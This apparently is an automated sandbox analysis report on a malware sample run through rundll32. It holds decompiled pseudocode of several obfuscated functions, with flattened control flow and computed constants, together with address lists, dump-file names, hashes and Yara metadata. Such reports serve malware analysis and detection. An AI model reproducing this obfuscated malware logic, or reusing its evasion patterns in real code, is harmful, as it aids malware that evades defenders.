				_v68 = 0x9eb1ac;
				_t266 = 0x4a;
				_v68 = _v68 * 0x7b;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0x87ec7921;
				_v104 = 0x24a1b7;
				_v104 = _v104 << 4;
				_v104 = _v104 | 0x0d0d6548;
				_t62 =  &_v104; // 0xd0d6548
				_v104 =  *_t62 / _t266;
				_v104 = _v104 ^ 0x003eb00a;
				_v96 = 0x109237;
				_v96 = _v96 ^ 0x088082ff;
				_v96 = _v96 >> 1;
				_v96 = _v96 ^ 0xdcc593d2;
				_v96 = _v96 ^ 0xd88ac121;
				_v100 = 0xaca53b;
				_v100 = _v100 >> 0xc;
				_t267 = 0x53;
				_v100 = _v100 * 0x47;
				_v100 = _v100 + 0xffff22d9;
				_v100 = _v100 ^ 0x0009f7ae;
				_v60 = 0xde163e;
				_v60 = _v60 + 0xffffe594;
				_v60 = _v60 ^ 0x00de9d26;
				_v120 = 0x240793;
				_v120 = _v120 / _t267;
				_v120 = _v120 * 0x19;
				_v120 = _v120 + 0xd430;
				_v120 = _v120 ^ 0x0006e0c9;
				_v124 = 0xc58e86;
				_t268 = 0x65;
				_v124 = _v124 / _t268;
				_v124 = _v124 >> 0xb;
				_v124 = _v124 ^ 0x9d14b09a;
				_v124 = _v124 ^ 0x9d1ca329;
				_v64 = 0xc78ca0;
				_v64 = _v64 | 0xd15d632f;
				_v64 = _v64 ^ 0xd1d5a42f;
				_v128 = 0x79ba0a;
				_v128 = _v128 ^ 0x7ce03b8e;
				_v128 = _v128 + 0x4723;
				_v128 = _v128 >> 0xa;
				_v128 = _v128 ^ 0x00126e73;
				_v112 = 0x301104;
				_v112 = _v112 ^ 0x99cc29f1;
				_v112 = _v112 >> 0xb;
				_v112 = _v112 << 0xe;
				_v112 = _v112 ^ 0xcfe465e8;
				_v72 = 0xf18177;
				_v72 = _v72 + 0xffff968e;
				_v72 = _v72 + 0x6cf6;
				_v72 = _v72 ^ 0x00fdce33;
				_v76 = 0xd90ee1;
				_v76 = _v76 + 0xffffa364;
				_v76 = _v76 ^ 0x3c048803;
				_v76 = _v76 ^ 0x3cd13d13;
				_v116 = 0xc42f7d;
				_v116 = _v116 >> 2;
				_v116 = _v116 + 0x3407;
				_v116 = _v116 >> 7;
				_v116 = _v116 ^ 0x0009b6df;
				_v48 = 0xe39a19;
				_v48 = _v48 | 0x7412591d;
				_v48 = _v48 ^ 0x74ffcd98;
				_v80 = 0xc90483;
				_v80 = _v80 >> 1;
				_t269 = 0x17;
				_v80 = _v80 / _t269;
				_v80 = _v80 * 0x7d;
				_v80 = _v80 ^ 0x0220ab71;
				_v84 = 0xc67ab0;
				_v84 = _v84 >> 0xa;
				_v84 = _v84 * 3;
				_v84 = _v84 | 0xfb397840;
				_v84 = _v84 ^ 0xfb3c3624;
				_t304 = _v44;
				_t299 = _v44;
				goto L1;
				do {
					while(1) {
						L1:
						_t307 = _t300 - 0x73106c8;
						if(_t307 > 0) {
							break;
						}
						if(_t307 == 0) {
							_t250 = E0035026B(_v96,  &_v40,  &_v32, _v100, _v60);
							_t305 = _t305 + 0xc;
							asm("sbb esi, esi");
							_t300 = ( ~_t250 & 0x022a085a) + 0x44dd11e;
							continue;
						}
						if(_t300 == 0xc1fb10) {
							_t300 = 0xde7de8b;
							if(_v44 > 2) {
								_t261 = E0035561F(_v68, _v104,  *((intOrPtr*)(_t299 + 8)),  &_v36);
								_v40 = _t261;
								if(_t261 != 0) {
									_t300 = 0x73106c8;
								}
							}
							continue;
						}
						if(_t300 == 0x37ef4f2) {
							_t304 = E0035E35A();
							_t300 = 0xc8dd531;
							continue;
						}
						if(_t300 == 0x44dd11e) {
							E003468DE(_v112, _v72, _v76, _v116, _v40);
							_t305 = _t305 + 0xc;
							_t300 = 0xde7de8b;
							continue;
						}
						if(_t300 != 0x677d978) {
							goto L21;
						} else {
							_t256 =  *0x36520c; // 0x0
							E0034F4BD(_v120, _v124, _t256 + 0x220, _v64, _v28, _v24 + 1, _v128);
							_t277 =  *0x36520c; // 0x0
							_t305 = _t305 + 0x14;
							_t262 = 1;
							_t300 = 0x44dd11e;
							 *((intOrPtr*)(_t277 + 0x210)) = _v32;
							continue;
						}
					}
					if(_t300 == 0xc8dd531) {
						_t246 = E0034BC8A(_v88, _v52,  &_v44, _t304, _v56, _v92);
						_t299 = _t246;
						_t305 = _t305 + 0x10;
						if(_t246 == 0) {
							_t300 = 0xa73b483;
							goto L21;
						}
						_t300 = 0xc1fb10;
						goto L1;
					}
					if(_t300 == 0xde7de8b) {
						E0034FFF2(_v48, _v80, _v84, _t299);
						L24:
						return _t262;
					}
					if(_t300 != 0xfb124ba) {
						goto L21;
					}
					_t300 = 0x37ef4f2;
					goto L1;
					L21:
				} while (_t300 != 0xa73b483);
				goto L24;
			}


















































                                                                                                                      0x0034e249
                                                                                                                      0x0034e253
                                                                                                                      0x0034e25b
                                                                                                                      0x0034e265
                                                                                                                      0x0034e267
                                                                                                                      0x0034e26e
                                                                                                                      0x0034e276
                                                                                                                      0x0034e27b
                                                                                                                      0x0034e283
                                                                                                                      0x0034e28b
                                                                                                                      0x0034e293
                                                                                                                      0x0034e29b
                                                                                                                      0x0034e2ab
                                                                                                                      0x0034e2b0
                                                                                                                      0x0034e2b6
                                                                                                                      0x0034e2be
                                                                                                                      0x0034e2c3
                                                                                                                      0x0034e2cb
                                                                                                                      0x0034e2d3
                                                                                                                      0x0034e2db
                                                                                                                      0x0034e2e3
                                                                                                                      0x0034e2f0
                                                                                                                      0x0034e2f3
                                                                                                                      0x0034e2f7
                                                                                                                      0x0034e2ff
                                                                                                                      0x0034e307
                                                                                                                      0x0034e30f
                                                                                                                      0x0034e31f
                                                                                                                      0x0034e323
                                                                                                                      0x0034e32b
                                                                                                                      0x0034e338
                                                                                                                      0x0034e33b
                                                                                                                      0x0034e33f
                                                                                                                      0x0034e344
                                                                                                                      0x0034e34c
                                                                                                                      0x0034e354
                                                                                                                      0x0034e359
                                                                                                                      0x0034e361
                                                                                                                      0x0034e369
                                                                                                                      0x0034e36d
                                                                                                                      0x0034e375
                                                                                                                      0x0034e37d
                                                                                                                      0x0034e385
                                                                                                                      0x0034e389
                                                                                                                      0x0034e391
                                                                                                                      0x0034e399
                                                                                                                      0x0034e3a1
                                                                                                                      0x0034e3ab
                                                                                                                      0x0034e3ac
                                                                                                                      0x0034e3b0
                                                                                                                      0x0034e3b8
                                                                                                                      0x0034e3c0
                                                                                                                      0x0034e3c8
                                                                                                                      0x0034e3d0
                                                                                                                      0x0034e3d8
                                                                                                                      0x0034e3e6
                                                                                                                      0x0034e3ef
                                                                                                                      0x0034e3f3
                                                                                                                      0x0034e3fb
                                                                                                                      0x0034e405
                                                                                                                      0x0034e413
                                                                                                                      0x0034e418
                                                                                                                      0x0034e41e
                                                                                                                      0x0034e423
                                                                                                                      0x0034e42b
                                                                                                                      0x0034e433
                                                                                                                      0x0034e43b
                                                                                                                      0x0034e443
                                                                                                                      0x0034e44b
                                                                                                                      0x0034e453
                                                                                                                      0x0034e45b
                                                                                                                      0x0034e463
                                                                                                                      0x0034e468
                                                                                                                      0x0034e470
                                                                                                                      0x0034e478
                                                                                                                      0x0034e480
                                                                                                                      0x0034e485
                                                                                                                      0x0034e48a
                                                                                                                      0x0034e492
                                                                                                                      0x0034e49a
                                                                                                                      0x0034e4a2
                                                                                                                      0x0034e4aa
                                                                                                                      0x0034e4b2
                                                                                                                      0x0034e4ba
                                                                                                                      0x0034e4c2
                                                                                                                      0x0034e4ca
                                                                                                                      0x0034e4d2
                                                                                                                      0x0034e4da
                                                                                                                      0x0034e4df
                                                                                                                      0x0034e4e7
                                                                                                                      0x0034e4ec
                                                                                                                      0x0034e4f4
                                                                                                                      0x0034e4fc
                                                                                                                      0x0034e504
                                                                                                                      0x0034e50c
                                                                                                                      0x0034e514
                                                                                                                      0x0034e51c
                                                                                                                      0x0034e51f
                                                                                                                      0x0034e528
                                                                                                                      0x0034e52c
                                                                                                                      0x0034e534
                                                                                                                      0x0034e53c
                                                                                                                      0x0034e546
                                                                                                                      0x0034e54a
                                                                                                                      0x0034e552
                                                                                                                      0x0034e55a
                                                                                                                      0x0034e55e
                                                                                                                      0x0034e55e
                                                                                                                      0x0034e562
                                                                                                                      0x0034e562
                                                                                                                      0x0034e562
                                                                                                                      0x0034e562
                                                                                                                      0x0034e568
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e56e
                                                                                                                      0x0034e680
                                                                                                                      0x0034e685
                                                                                                                      0x0034e68c
                                                                                                                      0x0034e694
                                                                                                                      0x00000000
                                                                                                                      0x0034e694
                                                                                                                      0x0034e57a
                                                                                                                      0x0034e633
                                                                                                                      0x0034e638
                                                                                                                      0x0034e64e
                                                                                                                      0x0034e653
                                                                                                                      0x0034e65b
                                                                                                                      0x0034e661
                                                                                                                      0x0034e661
                                                                                                                      0x0034e65b
                                                                                                                      0x00000000
                                                                                                                      0x0034e638
                                                                                                                      0x0034e586
                                                                                                                      0x0034e622
                                                                                                                      0x0034e624
                                                                                                                      0x00000000
                                                                                                                      0x0034e624
                                                                                                                      0x0034e592
                                                                                                                      0x0034e607
                                                                                                                      0x0034e60c
                                                                                                                      0x0034e60f
                                                                                                                      0x00000000
                                                                                                                      0x0034e60f
                                                                                                                      0x0034e59a
                                                                                                                      0x00000000
                                                                                                                      0x0034e5a0
                                                                                                                      0x0034e5b8
                                                                                                                      0x0034e5cb
                                                                                                                      0x0034e5d0
                                                                                                                      0x0034e5df
                                                                                                                      0x0034e5e2
                                                                                                                      0x0034e5e3
                                                                                                                      0x0034e5e8
                                                                                                                      0x00000000
                                                                                                                      0x0034e5e8
                                                                                                                      0x0034e59a
                                                                                                                      0x0034e6a5
                                                                                                                      0x0034e6d7
                                                                                                                      0x0034e6dc
                                                                                                                      0x0034e6de
                                                                                                                      0x0034e6e3
                                                                                                                      0x0034e6ef
                                                                                                                      0x00000000
                                                                                                                      0x0034e6ef
                                                                                                                      0x0034e6e5
                                                                                                                      0x00000000
                                                                                                                      0x0034e6e5
                                                                                                                      0x0034e6ad
                                                                                                                      0x0034e70f
                                                                                                                      0x0034e719
                                                                                                                      0x0034e722
                                                                                                                      0x0034e722
                                                                                                                      0x0034e6b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034e6b7
                                                                                                                      0x00000000
                                                                                                                      0x0034e6f4
                                                                                                                      0x0034e6f4
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #G$?=$He
                                                                                                                      • API String ID: 0-2298667298
                                                                                                                      • Opcode ID: b67d283655cdb3b55715e605852151ff48a8f7f654a9859985bf5690d351f105
                                                                                                                      • Instruction ID: 6bab34021a63e9bfea2a1df219302c789efa6a9ae6c8939a112347a9a3a0c06f
                                                                                                                      • Opcode Fuzzy Hash: b67d283655cdb3b55715e605852151ff48a8f7f654a9859985bf5690d351f105
                                                                                                                      • Instruction Fuzzy Hash: 9CC162728083809FC359CF65D48A40BFBE1FBC5358F51892DF59A8A260D7B5E949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034911A Relevance: 4.0, Strings: 3, Instructions: 254COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0034911A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v52;
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v92;
				intOrPtr _v100;
				char _v112;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v156;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				void* _t162;
				signed int _t176;
				signed int _t184;
				void* _t198;
				void* _t200;
				void* _t202;
				intOrPtr _t207;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				void* _t235;
				void* _t236;
				void* _t238;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t162);
				_v68 = 0x6e7241;
				_t236 = _t235 + 0x10;
				asm("stosd");
				_t198 = 0;
				_t200 = 0x513154f;
				asm("stosd");
				_t231 = 0x5b;
				asm("stosd");
				_v208 = 0x6dc976;
				_v208 = _v208 + 0xffff97e7;
				_v208 = _v208 << 0xf;
				_v208 = _v208 + 0xffff3ee4;
				_v208 = _v208 ^ 0xb0a037f9;
				_v216 = 0xefa27a;
				_v216 = _v216 * 0x2d;
				_v216 = _v216 << 0xe;
				_v216 = _v216 + 0x5c30;
				_v216 = _v216 ^ 0xe3d2b40e;
				_v192 = 0xd4fef0;
				_v192 = _v192 / _t231;
				_v192 = _v192 << 9;
				_v192 = _v192 ^ 0x04a09c26;
				_v172 = 0xfabcfe;
				_v172 = _v172 + 0xadb7;
				_v172 = _v172 ^ 0x00f6fe01;
				_v224 = 0xb5a285;
				_t232 = 0x43;
				_v224 = _v224 * 0x7a;
				_v224 = _v224 >> 1;
				_v224 = _v224 | 0x4641179d;
				_v224 = _v224 ^ 0x6f41a140;
				_v212 = 0x80e1bd;
				_v212 = _v212 / _t232;
				_v212 = _v212 << 9;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 ^ 0x0005f6ff;
				_v220 = 0x3f6ee7;
				_v220 = _v220 >> 5;
				_v220 = _v220 << 0xf;
				_v220 = _v220 | 0x5ccf7ed2;
				_v220 = _v220 ^ 0xfdf08ccb;
				_v188 = 0x96b178;
				_v188 = _v188 * 0x33;
				_v188 = _v188 << 7;
				_v188 = _v188 ^ 0x02ac94c8;
				_v196 = 0x862d42;
				_v196 = _v196 | 0x17619c21;
				_v196 = _v196 ^ 0x73c665d7;
				_v196 = _v196 ^ 0x642dc428;
				_v176 = 0xd9c085;
				_v176 = _v176 | 0xddbc98a5;
				_v176 = _v176 ^ 0xddfc0835;
				_v180 = 0xc6bbdd;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0x2850aa5e;
				_v168 = 0x548f7e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x015ffca1;
				_v204 = 0x6ca805;
				_v204 = _v204 + 0x3ad1;
				_v204 = _v204 * 0x44;
				_v204 = _v204 ^ 0x1ce18dde;
				_v184 = 0x9ecbae;
				_v184 = _v184 << 5;
				_v184 = _v184 ^ 0x13d028d8;
				_t233 = _v184;
				_v200 = 0xbd8de1;
				_v200 = _v200 + 0xffffb408;
				_v200 = _v200 | 0x119192b9;
				_v200 = _v200 ^ 0x11b45be6;
				while(1) {
					_t238 = _t200 - 0x8a8a415;
					if(_t238 <= 0) {
					}
					L2:
					if(_t238 == 0) {
						_t176 = E0034CA43( &_v164, _v196, _v176, _v180,  &_v156, _v168);
						_t236 = _t236 + 0x10;
						asm("sbb ecx, ecx");
						_t200 = ( ~_t176 & 0x03566572) + 0x6fcaad9;
						continue;
						do {
							while(1) {
								_t238 = _t200 - 0x8a8a415;
								if(_t238 <= 0) {
								}
								goto L2;
							}
							L45:
							__eflags = _t200 - 0x409adf;
						} while (__eflags != 0);
						L46:
						return _t198;
					}
					if(_t200 == 0x1cefc96) {
						__eflags = _v148 - 1;
						if(__eflags == 0) {
							E0034472E( &_v112);
							L16:
							_t200 = 0xdce0ab1;
							while(1) {
								_t238 = _t200 - 0x8a8a415;
								if(_t238 <= 0) {
								}
								goto L2;
							}
						}
						_t200 = 0x6447723;
						while(1) {
							_t238 = _t200 - 0x8a8a415;
							if(_t238 <= 0) {
							}
							goto L25;
						}
						goto L2;
					}
					if(_t200 == 0x26bd5bb) {
						__eflags = _v148 - 6;
						if(__eflags == 0) {
							E0035A429( &_v112);
							goto L16;
						}
						_t200 = 0xcc2cd30;
						continue;
					}
					if(_t200 == 0x513154f) {
						E003564C5(_v208, _v216, _v192, _v172, _a4,  &_v52);
						_t236 = _t236 + 0x10;
						_t200 = 0x7b50d2c;
						continue;
					}
					if(_t200 == 0x6447723) {
						__eflags = _v148 - 2;
						if(__eflags == 0) {
							E00355040( &_v112, _t233);
							goto L16;
						}
						_t200 = 0x92d00b6;
						continue;
					}
					if(_t200 == 0x6fcaad9) {
						_t184 = E0035B9B1(_v224, _v212, __eflags,  &_v164, _v220,  &_v52, _v188);
						_t236 = _t236 + 0x10;
						__eflags = _t184;
						if(__eflags == 0) {
							goto L46;
						}
						L12:
						_t200 = 0x8a8a415;
						continue;
					}
					if(_t200 != 0x7b50d2c) {
						goto L45;
					}
					E00346A1F(0);
					L10:
					_t200 = 0x6fcaad9;
					continue;
					L25:
					__eflags = _t200 - 0x92d00b6;
					if(_t200 == 0x92d00b6) {
						__eflags = _v148 - 3;
						if(__eflags == 0) {
							E003488F4( &_v112);
							_t200 = 0xdce0ab1;
							goto L45;
						}
						_t200 = 0xe60179d;
						continue;
					}
					__eflags = _t200 - 0xa53104b;
					if(_t200 == 0xa53104b) {
						_push(_t200);
						_push(_t200);
						_t202 = 0x44;
						_t233 = E00353512(_t202);
						__eflags = _t233;
						if(__eflags == 0) {
							goto L12;
						}
						_t200 = 0x1cefc96;
						 *((intOrPtr*)(_t233 + 0x20)) = _v100;
						 *((intOrPtr*)(_t233 + 0x40)) = _v144;
						 *((intOrPtr*)(_t233 + 0x34)) = _v92;
						continue;
					}
					__eflags = _t200 - 0xc419b15;
					if(_t200 == 0xc419b15) {
						__eflags = _v148 - 5;
						if(__eflags == 0) {
							E00350946( &_v112, _t233);
							goto L16;
						}
						_t200 = 0x26bd5bb;
						continue;
					}
					__eflags = _t200 - 0xcc2cd30;
					if(_t200 == 0xcc2cd30) {
						__eflags = _v148 - 7;
						if(__eflags == 0) {
							E00347B82( &_v112);
						}
						goto L16;
					}
					__eflags = _t200 - 0xdce0ab1;
					if(__eflags == 0) {
						_t207 =  *0x365c94; // 0x0
						_t198 = _t198 + 1;
						 *_t233 =  *(_t207 + 0x230);
						 *(_t207 + 0x230) = _t233;
						goto L10;
					}
					__eflags = _t200 - 0xe60179d;
					if(_t200 != 0xe60179d) {
						goto L45;
					}
					__eflags = _v148 - 4;
					if(__eflags == 0) {
						E00342FA1( &_v112);
						goto L16;
					}
					_t200 = 0xc419b15;
				}
			}









































                                                                                                                      0x00349124
                                                                                                                      0x0034912b
                                                                                                                      0x00349132
                                                                                                                      0x00349133
                                                                                                                      0x00349134
                                                                                                                      0x00349139
                                                                                                                      0x0034914d
                                                                                                                      0x00349150
                                                                                                                      0x00349153
                                                                                                                      0x00349155
                                                                                                                      0x0034915c
                                                                                                                      0x0034915d
                                                                                                                      0x00349160
                                                                                                                      0x00349161
                                                                                                                      0x00349169
                                                                                                                      0x00349171
                                                                                                                      0x00349176
                                                                                                                      0x0034917e
                                                                                                                      0x00349186
                                                                                                                      0x00349193
                                                                                                                      0x00349197
                                                                                                                      0x0034919c
                                                                                                                      0x003491a4
                                                                                                                      0x003491ac
                                                                                                                      0x003491bc
                                                                                                                      0x003491c0
                                                                                                                      0x003491c5
                                                                                                                      0x003491cd
                                                                                                                      0x003491d5
                                                                                                                      0x003491dd
                                                                                                                      0x003491e5
                                                                                                                      0x003491f2
                                                                                                                      0x003491f3
                                                                                                                      0x003491f7
                                                                                                                      0x003491fb
                                                                                                                      0x00349203
                                                                                                                      0x0034920b
                                                                                                                      0x00349219
                                                                                                                      0x0034921d
                                                                                                                      0x00349222
                                                                                                                      0x00349227
                                                                                                                      0x0034922f
                                                                                                                      0x00349237
                                                                                                                      0x0034923c
                                                                                                                      0x00349241
                                                                                                                      0x00349249
                                                                                                                      0x00349251
                                                                                                                      0x0034925e
                                                                                                                      0x00349262
                                                                                                                      0x00349267
                                                                                                                      0x0034926f
                                                                                                                      0x00349277
                                                                                                                      0x0034927f
                                                                                                                      0x00349287
                                                                                                                      0x0034928f
                                                                                                                      0x00349297
                                                                                                                      0x0034929f
                                                                                                                      0x003492a7
                                                                                                                      0x003492b4
                                                                                                                      0x003492b8
                                                                                                                      0x003492c0
                                                                                                                      0x003492c8
                                                                                                                      0x003492cd
                                                                                                                      0x003492d5
                                                                                                                      0x003492e2
                                                                                                                      0x003492f4
                                                                                                                      0x003492f8
                                                                                                                      0x00349300
                                                                                                                      0x00349308
                                                                                                                      0x0034930d
                                                                                                                      0x00349315
                                                                                                                      0x00349319
                                                                                                                      0x00349321
                                                                                                                      0x00349329
                                                                                                                      0x00349331
                                                                                                                      0x00349339
                                                                                                                      0x00349339
                                                                                                                      0x0034933b
                                                                                                                      0x0034933b
                                                                                                                      0x00349341
                                                                                                                      0x00349341
                                                                                                                      0x00349477
                                                                                                                      0x0034947c
                                                                                                                      0x00349483
                                                                                                                      0x0034948b
                                                                                                                      0x00349491
                                                                                                                      0x00349339
                                                                                                                      0x00349339
                                                                                                                      0x00349339
                                                                                                                      0x0034933b
                                                                                                                      0x0034933b
                                                                                                                      0x00000000
                                                                                                                      0x0034933b
                                                                                                                      0x003495b0
                                                                                                                      0x003495b0
                                                                                                                      0x003495b0
                                                                                                                      0x003495bf
                                                                                                                      0x003495c8
                                                                                                                      0x003495c8
                                                                                                                      0x0034934d
                                                                                                                      0x0034943f
                                                                                                                      0x00349444
                                                                                                                      0x00349457
                                                                                                                      0x003493e8
                                                                                                                      0x003493e8
                                                                                                                      0x00349339
                                                                                                                      0x00349339
                                                                                                                      0x0034933b
                                                                                                                      0x0034933b
                                                                                                                      0x00000000
                                                                                                                      0x0034933b
                                                                                                                      0x00349339
                                                                                                                      0x00349446
                                                                                                                      0x00349339
                                                                                                                      0x00349339
                                                                                                                      0x0034933b
                                                                                                                      0x0034933b
                                                                                                                      0x00000000
                                                                                                                      0x0034933b
                                                                                                                      0x00000000
                                                                                                                      0x00349339
                                                                                                                      0x00349359
                                                                                                                      0x00349420
                                                                                                                      0x00349425
                                                                                                                      0x00349438
                                                                                                                      0x00000000
                                                                                                                      0x00349438
                                                                                                                      0x00349427
                                                                                                                      0x00000000
                                                                                                                      0x00349427
                                                                                                                      0x00349365
                                                                                                                      0x0034940e
                                                                                                                      0x00349413
                                                                                                                      0x00349416
                                                                                                                      0x00000000
                                                                                                                      0x00349416
                                                                                                                      0x00349371
                                                                                                                      0x003493c9
                                                                                                                      0x003493ce
                                                                                                                      0x003493e3
                                                                                                                      0x00000000
                                                                                                                      0x003493e3
                                                                                                                      0x003493d0
                                                                                                                      0x00000000
                                                                                                                      0x003493d0
                                                                                                                      0x00349379
                                                                                                                      0x003493b2
                                                                                                                      0x003493b7
                                                                                                                      0x003493ba
                                                                                                                      0x003493bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003493c2
                                                                                                                      0x003493c2
                                                                                                                      0x00000000
                                                                                                                      0x003493c2
                                                                                                                      0x00349381
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00349389
                                                                                                                      0x0034938e
                                                                                                                      0x0034938e
                                                                                                                      0x00000000
                                                                                                                      0x00349496
                                                                                                                      0x00349496
                                                                                                                      0x0034949c
                                                                                                                      0x00349591
                                                                                                                      0x00349596
                                                                                                                      0x003495a9
                                                                                                                      0x003495ae
                                                                                                                      0x00000000
                                                                                                                      0x003495ae
                                                                                                                      0x00349598
                                                                                                                      0x00000000
                                                                                                                      0x00349598
                                                                                                                      0x003494a2
                                                                                                                      0x003494a8
                                                                                                                      0x00349556
                                                                                                                      0x00349557
                                                                                                                      0x0034955a
                                                                                                                      0x00349560
                                                                                                                      0x00349564
                                                                                                                      0x00349566
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00349573
                                                                                                                      0x00349578
                                                                                                                      0x0034957f
                                                                                                                      0x00349589
                                                                                                                      0x00000000
                                                                                                                      0x00349589
                                                                                                                      0x003494ae
                                                                                                                      0x003494b4
                                                                                                                      0x00349526
                                                                                                                      0x0034952b
                                                                                                                      0x00349540
                                                                                                                      0x00000000
                                                                                                                      0x00349540
                                                                                                                      0x0034952d
                                                                                                                      0x00000000
                                                                                                                      0x0034952d
                                                                                                                      0x003494b6
                                                                                                                      0x003494bc
                                                                                                                      0x0034950a
                                                                                                                      0x0034950f
                                                                                                                      0x0034951c
                                                                                                                      0x0034951c
                                                                                                                      0x00000000
                                                                                                                      0x0034950f
                                                                                                                      0x003494be
                                                                                                                      0x003494c0
                                                                                                                      0x003494f0
                                                                                                                      0x003494f6
                                                                                                                      0x003494fd
                                                                                                                      0x003494ff
                                                                                                                      0x00000000
                                                                                                                      0x003494ff
                                                                                                                      0x003494c2
                                                                                                                      0x003494c8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003494ce
                                                                                                                      0x003494d3
                                                                                                                      0x003494e6
                                                                                                                      0x00000000
                                                                                                                      0x003494e6
                                                                                                                      0x003494d5
                                                                                                                      0x003494d5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0\$Arn$n?
                                                                                                                      • API String ID: 0-1422779782
                                                                                                                      • Opcode ID: c7451a6f284634e3b54f9505b6974c85a3da567d5dad4d9d225e0647660ca84d
                                                                                                                      • Instruction ID: 9579c9d9b30ad86d4bb77e3fb2b4317e02c408ca9a46e12d8870d877c1ac9832
                                                                                                                      • Opcode Fuzzy Hash: c7451a6f284634e3b54f9505b6974c85a3da567d5dad4d9d225e0647660ca84d
                                                                                                                      • Instruction Fuzzy Hash: 5BB18870508381DFC76ACF24C49962FBBE5FBC5348F540A1EF6869A6A0D771A948CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034BD0F Relevance: 4.0, Strings: 3, Instructions: 247COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0034BD0F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v16;
				intOrPtr _v48;
				char _v52;
				char _v68;
				char _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t208;
				signed int _t226;
				char* _t228;
				signed int _t229;
				void* _t231;
				signed int _t234;
				intOrPtr _t242;
				intOrPtr* _t247;
				void* _t249;
				intOrPtr _t250;
				void* _t289;
				intOrPtr* _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int* _t301;

				_t291 = _a4;
				_t247 = __ecx;
				_push(_a8);
				_push(_t291);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t208);
				_v132 = 0x7182e5;
				_t301 =  &(( &_v156)[4]);
				_v132 = _v132 + 0x26fa;
				_t289 = 0;
				_t249 = 0xa47caa1;
				_t292 = 0x79;
				_v132 = _v132 / _t292;
				_t293 = 0x16;
				_v132 = _v132 / _t293;
				_v132 = _v132 ^ 0x00000aee;
				_v140 = 0x29ca9c;
				_v140 = _v140 + 0x24a5;
				_v140 = _v140 << 5;
				_v140 = _v140 + 0xffff55cc;
				_v140 = _v140 ^ 0x053d3dfc;
				_v136 = 0x4d5d35;
				_v136 = _v136 | 0x2dd38e58;
				_v136 = _v136 + 0xffffc96a;
				_v136 = _v136 | 0xcd817148;
				_v136 = _v136 ^ 0xedde351d;
				_v152 = 0x709b91;
				_t294 = 0x24;
				_v152 = _v152 / _t294;
				_v152 = _v152 | 0xc56f7625;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x5bd1c7f0;
				_v144 = 0x2195b1;
				_v144 = _v144 | 0x0c2b25b9;
				_v144 = _v144 << 8;
				_v144 = _v144 | 0x32a70c97;
				_v144 = _v144 ^ 0x3bb2e9a3;
				_v120 = 0x3a67b3;
				_v120 = _v120 + 0xffff86f2;
				_v120 = _v120 + 0xf6d6;
				_v120 = _v120 ^ 0x00358b42;
				_v108 = 0x732c66;
				_t68 =  &_v108; // 0x732c66
				_t295 = 0x35;
				_v108 =  *_t68 / _t295;
				_v108 = _v108 << 0xb;
				_v108 = _v108 ^ 0x11669525;
				_v156 = 0x38089d;
				_v156 = _v156 ^ 0x13a0f5b7;
				_v156 = _v156 | 0xc9f1c7ca;
				_v156 = _v156 << 0xf;
				_v156 = _v156 ^ 0xfffe1365;
				_v128 = 0x743938;
